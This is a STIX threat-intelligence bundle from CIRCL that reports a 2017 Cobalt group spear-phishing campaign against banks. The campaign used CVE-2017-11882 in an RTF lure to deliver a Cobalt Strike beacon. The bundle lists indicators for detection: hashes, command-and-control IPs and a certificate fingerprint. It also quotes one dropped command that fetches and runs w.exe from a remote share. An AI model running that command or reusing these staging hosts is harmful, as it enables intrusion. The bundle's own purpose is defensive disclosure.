{ "type": "bundle", "id": "bundle--5a25117c-6260-44a1-91b4-489d02de0b81", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-05T03:00:30.000Z", "modified": "2017-12-05T03:00:30.000Z", "name": "CIRCL", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5a25117c-6260-44a1-91b4-489d02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-05T03:00:30.000Z", "modified": "2017-12-05T03:00:30.000Z", "name": "OSINT - Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions", "published": "2017-12-28T13:28:31Z", "object_refs": [ "observed-data--5a25118a-c6f8-4fed-9728-45e002de0b81", "url--5a25118a-c6f8-4fed-9728-45e002de0b81", "x-misp-attribute--5a2511a6-d02c-4685-9c2f-458702de0b81", "vulnerability--5a251915-1914-4a0a-bf26-453102de0b81", "x-misp-attribute--5a25192f-78d8-43ac-a5e7-448402de0b81", "indicator--5a251955-b768-423a-9ce5-43dc02de0b81", "observed-data--5a25197e-d52c-4094-a610-4e3b02de0b81", "url--5a25197e-d52c-4094-a610-4e3b02de0b81", "indicator--5a2519a1-f3c4-4887-bb32-4b8102de0b81", "indicator--5a2519a1-34b0-4da9-b685-421e02de0b81", "indicator--5a2519da-6f38-4196-a492-431202de0b81", "indicator--5a251a0c-d1c4-43ca-b569-448202de0b81" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "misp-galaxy:threat-actor=\"Cobalt\"", "circl:topic=\"finance\"" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5a25118a-c6f8-4fed-9728-45e002de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:13:49.000Z", "modified": "2017-12-04T09:13:49.000Z", "first_observed": "2017-12-04T09:13:49Z", "last_observed": "2017-12-04T09:13:49Z", "number_observed": 1, "object_refs": [ 
"url--5a25118a-c6f8-4fed-9728-45e002de0b81" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"", "osint:certainty=\"93\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5a25118a-c6f8-4fed-9728-45e002de0b81", "value": "https://www.riskiq.com/blog/labs/cobalt-strike/" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5a2511a6-d02c-4685-9c2f-458702de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:13:49.000Z", "modified": "2017-12-04T09:13:49.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"External analysis\"", "osint:source-type=\"blog-post\"", "osint:certainty=\"93\"" ], "x_misp_category": "External analysis", "x_misp_type": "text", "x_misp_value": "In a recent spear-phishing campaign, the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike. However, they gave up much more information than they intended.\r\n\r\nOn Tuesday, November 21, a massive spear-phishing campaign began targeting individual employees at various financial institutions, mostly in Russia and Turkey. Purporting to provide info on changes to \u2018SWIFT\u2019 terms, the email contained a single attachment with no text in the body."
}, { "type": "vulnerability", "spec_version": "2.1", "id": "vulnerability--5a251915-1914-4a0a-bf26-453102de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:44:53.000Z", "modified": "2017-12-04T09:44:53.000Z", "name": "CVE-2017-11882", "labels": [ "misp:type=\"vulnerability\"", "misp:category=\"Payload delivery\"" ], "external_references": [ { "source_name": "cve", "external_id": "CVE-2017-11882" } ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5a25192f-78d8-43ac-a5e7-448402de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:45:19.000Z", "modified": "2017-12-04T09:45:19.000Z", "labels": [ "misp:type=\"text\"", "misp:category=\"Artifacts dropped\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Artifacts dropped", "x_misp_type": "text", "x_misp_value": "cmd /c start \\\\138.68.234.128\\w\\w.exe &AAAAAC" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a251955-b768-423a-9ce5-43dc02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:45:57.000Z", "modified": "2017-12-04T09:45:57.000Z", "description": "At RiskIQ, one of the datasets built from our large quantities of Internet data is a repository of SSL certificates and where we\u2019ve seen them. What\u2019s interesting about the case mentioned above is that the host is using a certificate seemingly shipped with Cobalt Strike by default. We can look up the certificate in RiskIQ Community via its SHA1 fingerprint", "pattern": "[x509-certificate:hashes.SHA1 = '6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:45:57Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"x509-fingerprint-sha1\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5a25197e-d52c-4094-a610-4e3b02de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:46:38.000Z", "modified": "2017-12-04T09:46:38.000Z", "first_observed": "2017-12-04T09:46:38Z", "last_observed": "2017-12-04T09:46:38Z", "number_observed": 1, "object_refs": [ "url--5a25197e-d52c-4094-a610-4e3b02de0b81" ], "labels": [ "misp:type=\"link\"", "misp:category=\"External analysis\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5a25197e-d52c-4094-a610-4e3b02de0b81", "value": "https://community.riskiq.com/projects/19bb67dd-2c51-7284-e5f2-7b79537e13d3" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519a1-f3c4-4887-bb32-4b8102de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:47:13.000Z", "modified": "2017-12-04T09:47:13.000Z", "description": "Payload staging server", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '138.68.234.128']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519a1-34b0-4da9-b685-421e02de0b81", "created_by_ref":
"identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:47:13.000Z", "modified": "2017-12-04T09:47:13.000Z", "description": "Cobalt Strike server", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '104.144.207.207']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a2519da-6f38-4196-a492-431202de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:48:10.000Z", "modified": "2017-12-04T09:48:10.000Z", "pattern": "[file:hashes.MD5 = 'f360d41a0b42b129f7f0c29f98381416' AND file:name = 'Swift changes.rtf' AND file:x_misp_text = 'CVE-2017-11882 exploit document downloading Cobalt Strike beacon' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:48:10Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5a251a0c-d1c4-43ca-b569-448202de0b81", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2017-12-04T09:49:23.000Z", "modified": "2017-12-04T09:49:23.000Z", "pattern": "[file:hashes.MD5 = 'd46df9eacfe7ff75e098942e541d0f18' AND file:name = 'w.exe' AND file:x_misp_text = 'Cobalt Strike beacon' AND file:x_misp_state = 'Malicious']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2017-12-04T09:49:23Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", 
"misp:to_ids=\"True\"" ] }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }